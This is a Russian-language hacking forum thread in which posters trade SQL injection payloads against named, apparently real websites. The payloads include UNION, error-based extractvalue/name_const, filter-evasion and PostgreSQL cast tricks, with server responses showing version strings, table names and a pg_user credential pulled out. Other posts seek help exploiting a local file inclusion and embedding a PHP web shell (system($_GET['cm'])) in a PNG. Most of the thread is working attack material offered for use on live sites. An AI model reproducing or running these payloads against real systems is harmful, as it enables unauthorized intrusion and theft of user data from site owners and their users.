www.mebi.us/out.php?id=5+and+mid(version(),1,1)=5 upd Второй случай более интересен: www.sport-trade.ru/out.php?id=-9'+union+select+1,2,3,4,5,6,7,8,9,version(),11+--+ Смотрим заголовок ответа сервера: HTTP/1.1 302 Moved Temporarily Server nginx/1.1.5 Date Thu,10 Oct 2013 10:31:04 GMT Content-Type text/ng Transfer-Encoding chunked Connection keep-alive X-Powered-By PHP/5.2.17 location /out.php?id=5.1.70-cll Ну или смотри адресную строку.
http://www.sport-trade.ru/out.php?key=cat&a=item&item_id=7147%27%20UNION%20SELECT%201,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17+--+ http://www.mebi.us/out.php?id=9&did=311%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,user%28%29,12,13,14,15,16+--+
отправляю 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' получаю: CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S21]: Column already exists: 1060 Duplicate column name '5.5.33-log' отправляю: 'and(select%201%20from(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20limit%2010,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and' получаю: CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201%20from(select%20count(*),concat((select%20table_name%20from%20information_s' at line 3 выше подсказывали с "+" убрал, смог решить проблему. Тут хз что делать...если можно опишите подробно из-за чего возникает такая проблема с запросом! Спасибо.
Always, а что, если вместо пробелов использовать комментарии - /**/, или слитные конструкции ? Как видно на примере, они не декодятся в аски символы и сырые попадают в запрос.
Ну если там рерайт и параметры берутся из request_uri то "/" у него не получится использовать. В таком случае, остаются беспробельные конструкции.
заменилна - /**/ CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*' LIKE url_id' at line 3
Как я написал выше, в случае рерайта "/" игнорируется, как разделитель между параметрами(впрочем, зависит от самого рерайта конечно). Можешь попробовать беспробельные варианты, скобки как вариант.
Да, все верно написали. Сократить текущий запрос до того, чтобы там не было ни одного пробела\спец-символа увы нельзя. Если там есть функция extractvalue, можно через неё часть данных выводить, если нет: and(select(1)from(information_schema.tables)group by(concat(,floor(rand(0)*2)))having(min(0))) Кто уберет последний пробел ? Для вывода чего-то по-очередно нужен лимит.. а там тоже коварный пробел всё портит.
Почитать мануал по функциям и описание уязвимости на mysql.com Примеры запросов с беспробельным дополнением extractvalue/updatexml Вместо user() конструируешь подзапрос на вывод нужной информации, а лимитируешь mid/substring на 32 символа. И да, надеюсь это чисто в образовательных целях, иначе твои действия могут преследоваться по закону.
Относится ли это к скули? Warning: Function smartyShowObject() is deprecated in /var/www/сайт/сайт/tools/smarty_v2/compile/%%DE^DEF^DEF53A4D%%search.tpl.php on line 32 in /var/www/сайт/сайт/classes/Tools.php on line 1903 Помогите получить данные Code: http://www.it-kerDELETEch.com.ua/model_list?id=3&mod=1119%27*extractvalue%281,concat_ws%280x27,0x27,%28select%28table_name%29from%28information_schema./*!tables*/%29limit/**/90,1%29%29%29*%27
www.it-kerch.com.ua/model_list?id=3&mod=1119' union -- %0A%0D select*from(select 1)a1 join(select version())a2 join(select 3)a3 join(select 4)a4 join(select 5)a5 join(select 6)a6 join(select 7)a7+--+
YaBt Версию я итак знаю 5.1.69-cll-lve Code: http://www.it-kerУДАЛИТЬch.com.ua/model_list?id=3&mod=1119%27*extractvalue%281,concat_ws%280x27,0x27,%28select%28table_name%29from%28information_schema./*!tables*/%29limit/**/90,2%29%29%29*%27 Я имею ввиду перебрать весь лимит от 0,1 до 95,1 и узнать где данные юзеров. Я б и сам перебрал, но у меня SQLMAP не настраивается, я уже и видосы смотрел и мануалы читал.. нефига!
http://24alco . com /index.php?route=product/special при переходе выдает ошибку синтаксиса, гляньте спецы!
В общем, нашел LFI, не получается раскрутить из-за нехватки памяти. Пробую загрузить через уязвимый скрипт /proc/self/fd/2 В ответ получаю: Понятно, не хватает выделенной в настройках PHP памяти. Есть варианты как-то обойти сие ограничение?
Ночь добрая! отправляю: 1'+union+select+1,2,3,4,5,6-- false выпадает: Query failed: ERROR: each UNION query must have the same number of columns LINE отправляю: '+union+select+1,2,3,4,5-- true Query failed: ERROR: UNION types timestamp without time zone and integer cannot be matched LINE 3 отправляю: 1'+union+select+1,2,3,4-- false Query failed: ERROR: each UNION query must have the same number of columns LINE 3 Насколько я понял из статьи: https://rdot.org 5 столбцов Решил перепроверить с '+union+select+null,null,null,null,null-- false '+union+select+null,null,null,null-- true Вроде понятно что количество столбцов 5 А как вывести колонку? Не пинайте первый раз с PostgreSQL мучаюсь
PostgreSQL не такой демократичный как mysql, типы данных должны совпадать в обеих запросах во первых если есть вывод ошибок то лучше раскрутить через нее, во вторых можно использовать конвертирование типов, в третьех можно методом тыка найти колонку которая подходит для ваших целей вобщем читай http://forum.antichat.ru/thread35599.html
А может есть какой нибудь раскрученный сайтик? Просто потренироваться....понять! ух... Вот таким запросам стал выводить имена) '+and+1=cast((SELECT+table_name+FROM+information_schema.tables+LIMIT+1+OFFSET+0)+as+int)-- может кому будет интересно! А это что за муть: запрос: '+and+1=cast((SELECT+usename||chr(58)||passwd+from+pg_user+LIMIT+1+OFFSET+3)+as+int)-- Query failed: ERROR: invalid input syntax for integer: "antoha:********" in пасс под звездочками...
Где-то читал, что при добавлении в png текстового чанка, php выполняет код внутри него. Попробовал добавить Code: <?php system($GET['cm']) php?> через TweakPNG, поместил в корневую директорию локалхоста, открываю изображение Code: localhost/Basketball.png?cm=mkdir hack , ищу папку хак, а ее нет. Как делать это правильно?
